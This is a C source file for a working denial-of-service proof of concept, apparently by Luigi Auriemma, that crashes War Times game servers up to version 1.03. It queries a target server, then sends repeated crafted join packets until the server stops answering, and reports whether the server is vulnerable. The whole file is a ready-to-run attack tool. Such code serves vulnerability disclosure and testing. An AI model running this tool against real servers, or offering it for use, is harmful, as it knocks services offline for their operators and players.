/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif



#define VER         "0.1"
#define BUFFSZ      65536
#define PORT        1939
#define TIMEOUT     5
#define MAXSOCK     17
#define DATASZ      64

#define SHOW(x)     printf(x "%s\n", p); \
                    p += DATASZ;



int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int wait);
void wartimes_send(int sd, u_char *data, u_long len, u_long type);
int wartimes_recv(int sd, u_char *buff, int readlen);
void check_tcp_fakes(int *sd, int num, u_char *buff, int buffsz);
int create_rand_string(u_char *data, int len, u_int tmp);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd[MAXSOCK],
            i,
            len;
    u_short port = PORT,
            server_port;
    u_char  *buff,
            password[DATASZ + 1],
            server_name[DATASZ],
            server_ver[DATASZ],
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "War Times <= 1.03 in-game server crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%d)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    buff = malloc(BUFFSZ + 1);
    if(!buff) std_err();

    fputs("- request informations:\n", stdout);
    sd[0] = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd[0] < 0) std_err();
    if(connect(sd[0], (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    len = send_recv(sd[0], "\x01", 1, buff, BUFFSZ, 0);
    close(sd[0]);

    buff[len] = 0x00;
    p = buff + 1;
    memcpy(server_name, p, DATASZ);
    SHOW("\n  Server name:      ");
    SHOW("  Admin:            ");
    SHOW("  Server IP:        ");
    server_port = *(u_short *)p;
    printf("  Server port:      %hu\n", server_port);
    p += 2 + DATASZ;
    memcpy(server_ver, p, DATASZ);
    SHOW("  Server version:   ");
    SHOW("  Map:              ");

    *password = 0x00;

    fputs("\n- start attack:\n", stdout);
    for(i = 0; i < MAXSOCK; i++) {  // only 2 times are needed
        printf("\n  Try %d: ", i);

        sd[i] = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd[i] < 0) std_err();

        if(connect(sd[i], (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();

        p = buff;
        *p++ = 0x04;
        strncpy(p, server_name, DATASZ);    p += DATASZ;
        memset(p, 'a', DATASZ);             p += DATASZ;
        strncpy(p, password, DATASZ);       p += DATASZ;
        strncpy(p, server_ver, DATASZ);     p += DATASZ;
        *(u_short *)p = server_port;        p += 2;

        if(send_recv(sd[i], buff, p - buff, buff, BUFFSZ, 1) < 0) {
            fputs("\n- socket timeout, probably the server is crashed\n", stdout);
            break;
        }

        if(buff[0] == 0x06) {
            if(buff[1] == 2) {
                fputs("\nError: server full\n\n", stdout);
                exit(1);

            } else if(buff[1] == 1) {
                fputs("\n- same player name, retry\n", stdout);
                close(sd[i--]);
                continue;

            } else if(buff[1] == 3) {
                fputs("\n- Server is protected by password, insert it:\n  ", stdout);
                fflush(stdin);
                fgets(password, sizeof(password) - 1, stdin);
                password[strlen(password) - 1] = 0x00;
                close(sd[i--]);
                continue;

            } else {
                printf("\nError: the player has not been accepted for the error 0x%08lx\n\n",
                    *(u_long *)(buff + 1));
                exit(1);
            }
        }
    }

    for(; i >= 0; i--) close(sd[i]);

    fputs("- check server:\n", stdout);
    sd[0] = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd[0] < 0) std_err();
    if(connect(sd[0], (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    if(send_recv(sd[0], "\x01", 1, buff, BUFFSZ, 1) < 0) {
        fputs("\nServer IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\nServer doesn't seem vulnerable\n\n", stdout);
    }
    close(sd[0]);

    return(0);
}



int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int wait) {
    int     len;

    wartimes_send(sd, in, insz, 0);
    if(wait) {
        if(timeout(sd) < 0) return(-1);
    }
    wartimes_recv(sd, out, 4);
    wartimes_recv(sd, out, 4);
    len = *(u_long *)out;
    if(len > outsz) exit(1);    // big data
    return(wartimes_recv(sd, out, len));
}



void wartimes_send(int sd, u_char *data, u_long len, u_long type) {
    int     tmp = len;

    if(send(sd, (void *)&type, 4, 0)
      < 0) std_err();
    if(send(sd, (void *)&tmp, 4, 0)
      < 0) std_err();
    if(send(sd, data, len, 0)
      < 0) std_err();
    fputc('.', stdout);
}



int wartimes_recv(int sd, u_char *buff, int readlen) {
    int     tmp,
            len;

    for(len = 0; len < readlen; len += tmp) {
        tmp = recv(sd, buff + len, readlen - len, 0);
        if(tmp < 0) std_err();
        if(!tmp) break;
        fputc('.', stdout);
    }
    return(len);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_long resolv(char *host) {
    struct hostent *hp;
    u_long host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

